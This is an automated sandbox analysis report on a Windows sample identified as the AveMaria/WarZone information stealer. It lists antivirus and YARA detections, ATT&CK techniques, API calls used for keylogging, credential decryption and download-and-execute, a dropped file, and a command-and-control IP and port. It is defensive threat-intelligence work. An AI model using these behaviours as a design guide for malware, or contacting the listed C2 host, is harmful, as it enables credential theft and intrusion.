Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 4ifN8B061M

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:1014791
Start date:09.12.2019
Start time:09:30:46
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 31s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:4ifN8B061M (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.phis.troj.spyw.evad.winEXE@4/2@0/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 31.8% (good quality ratio 31.4%)
  • Quality average: 90.2%
  • Quality standard deviation: 19.1%
HCA Information:
  • Successful, ratio: 80%
  • Number of executed functions: 97
  • Number of non-executed functions: 246
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, mscorsvw.exe
  • Excluded IPs from analysis (whitelisted): 2.20.142.254, 2.20.142.202, 205.185.216.10, 205.185.216.42
  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, a1363.dscg.akamai.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, crl.microsoft.com, crl.www.ms.akadns.net

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
AveMaria
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlImpactPost-Adversary Device AccessWithout Adversary Device Access
Valid AccountsExecution through API2Registry Run Keys / Startup Folder1Access Token Manipulation1Hidden Users1Credential Dumping2System Time Discovery1Remote File Copy21Input Capture21Data Encrypted1Commonly Used Port1Endpoint Denial of Service1
Replication Through Removable MediaService Execution2Hidden Files and Directories1Process Injection112Software Packing1Credentials in Files1Security Software Discovery2Remote ServicesData from Removable MediaExfiltration Over Other Network MediumUncommonly Used Port1Data Encrypted for Impact
External Remote ServicesWindows Management InstrumentationCreate Account1New Service1Deobfuscate/Decode Files or Information1Input Capture21System Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy21Disk Structure Wipe
Drive-by CompromiseScheduled TaskModify Existing Service1DLL Search Order HijackingObfuscated Files or Information2Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Cryptographic Protocol2Disk Content Wipe
Exploit Public-Facing ApplicationCommand-Line InterfaceNew Service1File System Permissions WeaknessMasquerading3Account ManipulationSystem Information Discovery12Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolService Stop
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceHidden Files and Directories1Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortInhibit System Recovery
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskVirtualization/Sandbox Evasion2Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortDefacement
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionAccess Token Manipulation1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolStored Data Manipulation
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection112Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionTransmitted Data Manipulation

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\ProgramData\images.exeAvira: detection malicious, Label: TR/Crypt.Agent.yyhho
Antivirus detection for sampleShow sources
Source: 4ifN8B061M.exeAvira: detection malicious, Label: TR/Crypt.Agent.yyhho
Multi AV Scanner detection for submitted fileShow sources
Source: 4ifN8B061M.exeVirustotal: Detection: 47%Perma Link
Yara detected AveMaria stealerShow sources
Source: Yara matchFile source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: images.exe PID: 3596, type: MEMORY
Source: Yara matchFile source: Process Memory Space: 4ifN8B061M.exe PID: 3380, type: MEMORY
Source: Yara matchFile source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped fileShow sources
Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: 4ifN8B061M.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 3.2.images.exe.430000.1.unpackAvira: Label: TR/RedCap.ghjpt
Source: 0.2.4ifN8B061M.exe.250000.1.unpackAvira: Label: TR/RedCap.ghjpt

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00259E04 lstrlenA,CryptStringToBinaryA,lstrcpyA,0_2_00259E04
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_002592D8 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,0_2_002592D8
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025AFDF PathFileExistsW,CopyFileW,CryptUnprotectData,LocalFree,0_2_0025AFDF
Source: C:\ProgramData\images.exeCode function: 3_2_00439E04 lstrlenA,CryptStringToBinaryA,lstrcpyA,3_2_00439E04
Source: C:\ProgramData\images.exeCode function: 3_2_004392D8 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,3_2_004392D8
Source: C:\ProgramData\images.exeCode function: 3_2_0043AFDF PathFileExistsW,CopyFileW,CryptUnprotectData,LocalFree,3_2_0043AFDF

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E879D FindFirstFileExA,0_2_012E879D
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00258A9C GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,0_2_00258A9C
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025DEC5 FindFirstFileW,FindNextFileW,0_2_0025DEC5
Source: C:\ProgramData\images.exeCode function: 3_2_00CC879D FindFirstFileExA,3_2_00CC879D
Source: C:\ProgramData\images.exeCode function: 3_2_0043DEC5 FindFirstFileW,FindNextFileW,3_2_0043DEC5
Source: C:\ProgramData\images.exeCode function: 3_2_00438A9C GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,3_2_00438A9C
Contains functionality to query local drivesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025DFC9 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,0_2_0025DFC9

Networking:

barindex
Detected non-DNS traffic on DNS portShow sources
Source: global trafficTCP traffic: 192.168.1.16:49172 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.1.16:49170 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.1.16:49169 -> 8.8.8.8:53
Contains functionality to download and execute PE filesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00252675 URLDownloadToFileW,ShellExecuteW,0_2_00252675
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.16:49171 -> 45.133.183.138:5200
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 45.133.183.138
Source: unknownTCP traffic detected without corresponding DNS query: 45.133.183.138
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025B424 recv,0_2_0025B424
Urls found in memory or binary dataShow sources
Source: 4ifN8B061M.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 4ifN8B061M.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 4ifN8B061M.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 4ifN8B061M.exeString found in binary or memory: http://ocsp.sectigo.com0
Source: 4ifN8B061M.exeString found in binary or memory: http://ocsp.thawte.com0
Source: 4ifN8B061M.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 4ifN8B061M.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 4ifN8B061M.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 4ifN8B061M.exe, images.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: 4ifN8B061M.exe, 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, images.exe, 00000003.00000003.566547321.0012A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: 4ifN8B061M.exeString found in binary or memory: https://sectigo.com/CPS0C

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025765A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,0_2_0025765A
Installs a raw input device (often for capturing keystrokes)Show sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_00257CB3 DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,0_2_00257CB3

E-Banking Fraud:

barindex
Yara detected AveMaria stealerShow sources
Source: Yara matchFile source: 00000003.00000003.566547321.0012A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.567782220.0012C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: images.exe PID: 3596, type: MEMORY
Source: Yara matchFile source: Process Memory Space: 4ifN8B061M.exe PID: 3380, type: MEMORY
Source: Yara matchFile source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012F7A200_2_012F7A20
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012F6AA60_2_012F6AA6
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012F85EF0_2_012F85EF
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012E3DFC0_2_012E3DFC
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012FD8600_2_012FD860
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012EB8400_2_012EB840
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012EBCE20_2_012EBCE2
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012EE7930_2_012EE793
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012EFA190_2_012EFA19
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_012EE6660_2_012EE666
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0025F9F30_2_0025F9F3
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_002492E70_2_002492E7
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0023F3320_2_0023F332
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: 0_2_0024931C0_2_0024931C
Source: C:\ProgramData\images.exeCode function: 3_2_00CD6AA63_2_00CD6AA6
Source: C:\ProgramData\images.exeCode function: 3_2_00CD7A203_2_00CD7A20
Source: C:\ProgramData\images.exeCode function: 3_2_00CCBCE23_2_00CCBCE2
Source: C:\ProgramData\images.exeCode function: 3_2_00CCB8403_2_00CCB840
Source: C:\ProgramData\images.exeCode function: 3_2_00CDD8603_2_00CDD860
Source: C:\ProgramData\images.exeCode function: 3_2_00CD85EF3_2_00CD85EF
Source: C:\ProgramData\images.exeCode function: 3_2_00CC3DFC3_2_00CC3DFC
Source: C:\ProgramData\images.exeCode function: 3_2_00CCE6663_2_00CCE666
Source: C:\ProgramData\images.exeCode function: 3_2_00CCFA193_2_00CCFA19
Source: C:\ProgramData\images.exeCode function: 3_2_00CCE7933_2_00CCE793
Source: C:\ProgramData\images.exeCode function: 3_2_0043F9F33_2_0043F9F3
Source: C:\ProgramData\images.exeCode function: 3_2_004292E73_2_004292E7
Source: C:\ProgramData\images.exeCode function: 3_2_0042931C3_2_0042931C
Source: C:\ProgramData\images.exeCode function: 3_2_0041F3323_2_0041F332
Found potential string decryption / allocating functionsShow sources
Source: C:\ProgramData\images.exeCode function: String function: 00CC1040 appears 117 times
Source: C:\ProgramData\images.exeCode function: String function: 00433412 appears 37 times
Source: C:\ProgramData\images.exeCode function: String function: 0043E907 appears 48 times
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: String function: 012E1040 appears 117 times
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: String function: 0025E907 appears 48 times
Source: C:\Users\user\Desktop\4ifN8B061M.exeCode function: String function: 00253412 appears 37 times
Sample file is different than original file name gathered from version infoShow sources
Source: 4ifN8B061M.exe, 00000000.00000002.424017777.000E0000.00000008.00000001.sdmpBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs 4ifN8B061M.exe
Yara signature matchShow sources
Source: 00000003.00000003.565700412.0013A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000003.565700412.0013A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.424063177.00230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000003.00000003.567703677.0013A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000003.567703677.0013A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000003.422033804.003DD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000003.422009641.003DA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000003.564800575.00130000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000003.00000002.577668662.00410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000003.421973490.003CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2_RID2C2E date = 2016-01-30 09:38:11, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.2.images.exe.430000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.4ifN8B061M.exe.250000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1_RID2C2D date = 2016-01-30 09:38:01, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
